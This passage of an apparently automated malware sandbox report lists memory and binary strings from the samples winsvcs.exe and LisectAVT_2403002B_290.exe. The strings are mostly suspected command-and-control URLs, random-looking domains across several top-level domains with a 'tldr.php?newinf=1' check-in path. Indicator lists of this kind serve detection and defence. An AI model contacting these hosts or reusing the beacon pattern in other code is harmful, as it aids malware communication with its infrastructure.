winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.net/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.com/
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.com/http://eiifngjfksisiufjf.com/http://eoroooskfogihisrg.com/http://noeuao
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.com/tldr.php?newinf=1B
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.net/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fuaiuebndieufeufu.su/tldr.php?newinf=1L0
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.com/tldr.php?newinf=1wk
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.in/tldr.php?newinf=1bh
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.net/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://iuirshriuisruruuf.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iuirshriuisruruuf.su/tldr.php?newinf=1so
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.biz/
